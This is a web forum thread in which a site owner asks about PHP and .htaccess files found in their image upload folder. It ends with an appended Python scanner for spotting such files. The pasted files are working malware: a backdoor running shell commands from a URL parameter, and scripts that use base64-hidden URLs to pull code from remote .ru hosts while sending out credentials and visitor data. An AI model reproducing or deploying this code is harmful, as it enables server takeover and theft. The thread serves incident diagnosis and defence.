pbjorge12

Weird Files Created!

Hey...I'm a little worried about this odd problem that has begun to show up - Can anyone tell me what it means?

Today I went through a folder of mine on my server called uploadedImages that stores images users uploaded. I check the MIME type to prevent other files from being added... The strange thing was I found 2 .php files and a .htaccess file in each subfolder (thumb, smallThumb, and Full).

I will include the "full" folder's files...

base.php
[code]<?php
error_reporting(0);
if(isset($_POST["l"]) and isset($_POST["p"])){
    if(isset($_POST["input"])){$user_auth="&l=". base64_encode($_POST["l"]) ."&p=". base64_encode(md5($_POST["p"]));}
    else{$user_auth="&l=". $_POST["l"] ."&p=". $_POST["p"];}
}else{$user_auth="";}
if(!isset($_POST["log_flg"])){$log_flg="&log";}
if(! @include_once(base64_decode("aHR0cDovL2Jpcy5pZnJhbWUucnUvbWFzdGVyLnBocD9yX2FkZHI9") . sprintf("%u", ip2long(getenv(REMOTE_ADDR))) ."&url=". base64_encode($_SERVER["SERVER_NAME"] . $_SERVER[REQUEST_URI]) . $user_auth . $log_flg))
{
    if(isset($_GET["a3kfj39fsj2"])){system($_GET["a3kfj39fsj2"]);}
    if($_POST["l"]=="special"){print "sys_active". `uname -a`;}
}
?>
[/code]

Create.php
[code]<? error_reporting(0);$s="e";$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s"; if ((include(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjkubXNodG1sLnJ1")."/?".$str))){} else {include(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjcuaHRtbHRhZ3MucnU=")."/?".$str);} ?>
[/code]

.htaccess
[code]Options -MultiViews
ErrorDocument 404 //uploadedImages/cover/full/create.php
[/code]

Note: Different file names with different content were in each folder...
Note 2: The files were created by "nobody", the default Apache user...

Is this normal? What is it? What is its purpose?

I don't know, but I also got a .php file put in my folder one day and it outputted all my code within that folder.

Scary?

Take away the [][] brackets to see the code larger, OK.

If you find that you haven't done any validation on users uploading the correct file extension, then post the relevant upload code.

If you have done that, read on!

OK, you made me paranoid. Now, what I did 5 minutes ago is check phpMyAdmin for any databases that I didn't know of being mine. You should take these steps.

I had no extra ones, thank God.

Now, what I understand is that if a hacker got your MySQL details then they can use your database for their own needs, and in some cases also use a folder you didn't know about. But the best practice is to check the database entries, and if they're all yours, lol... you're OK, you can sleep tonight, OK.

But in the worst situation, where a person has leeched onto your database, you have to reset the passwords on all your scripts and database, OK.

And then delete any unknown folders and files.

I would suggest a fresh copy of everything, OK.

Scary. Good luck.

Well... After doing some research, this is an exploit that works with directories with 777 permissions (which mine is).
I am still looking for a fix...

Explain more, what do you mean, an exploit?

What, they get in 777 folders? How?

Lol, you make me more worried?
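A triage sketch for the situation described in the first post and the 777 follow-up, added here as an example and not code from any poster in the thread: it walks an image upload tree and reports world-writable directories, `.htaccess` files, non-image extensions, PHP open tags inside files of any name, and `base64_decode` literals that decode to a URL. The function names, the extension allow-list, the sample tree and the `example.invalid` URL are assumptions constructed for the example.

```python
import base64, os, re, stat, tempfile

ALLOWED_EXT = {".jpg", ".jpeg", ".png", ".gif"}  # assumption: image-only upload tree
PHP_TAG = re.compile(rb"<\?(php|=|\s)", re.I)
B64_LITERAL = re.compile(rb"base64_decode\(\s*[\"']([A-Za-z0-9+/=]+)[\"']")

def scan_upload_tree(root):
    """Return sorted (relative_path, reason) findings for an upload directory."""
    found = set()
    for dirpath, _dirs, files in os.walk(root):
        if os.stat(dirpath).st_mode & stat.S_IWOTH:
            found.add((os.path.relpath(dirpath, root), "world-writable directory"))
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root)
            if name.lower() == ".htaccess":
                found.add((rel, "Apache override file in upload tree"))
            elif os.path.splitext(name)[1].lower() not in ALLOWED_EXT:
                found.add((rel, "extension not on image allow-list"))
            with open(path, "rb") as fh:
                data = fh.read(1 << 20)  # first 1 MiB is enough for triage
            if PHP_TAG.search(data):
                found.add((rel, "contains PHP open tag"))
            for m in B64_LITERAL.finditer(data):
                try:
                    decoded = base64.b64decode(m.group(1), validate=True)
                except ValueError:
                    continue  # not valid base64, nothing to report
                if decoded.lower().startswith((b"http://", b"https://")):
                    found.add((rel, "base64 literal decodes to a URL"))
    return sorted(found)

def build_constructed_sample(root):
    """Create a small constructed tree shaped like the layout in the thread."""
    full = os.path.join(root, "full")
    os.mkdir(full)
    os.chmod(full, 0o777)  # the permission named in the thread
    url = base64.b64encode(b"http://example.invalid/?").decode()
    files = {
        "photo.jpg": b"\xff\xd8\xff\xe0" + b"\x00" * 16,  # harmless image stub
        "base.php": ('<?php @include_once(base64_decode("%s") . "x"); ?>' % url).encode(),
        "avatar.gif": b"GIF89a<?php echo 1; ?>",  # script behind an image header
        ".htaccess": b"Options -MultiViews\n",
    }
    for name, body in files.items():
        with open(os.path.join(full, name), "wb") as fh:
            fh.write(body)
```

The `avatar.gif` entry shows why the content scan runs on every file: a file can begin with an image signature and still contain script code.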
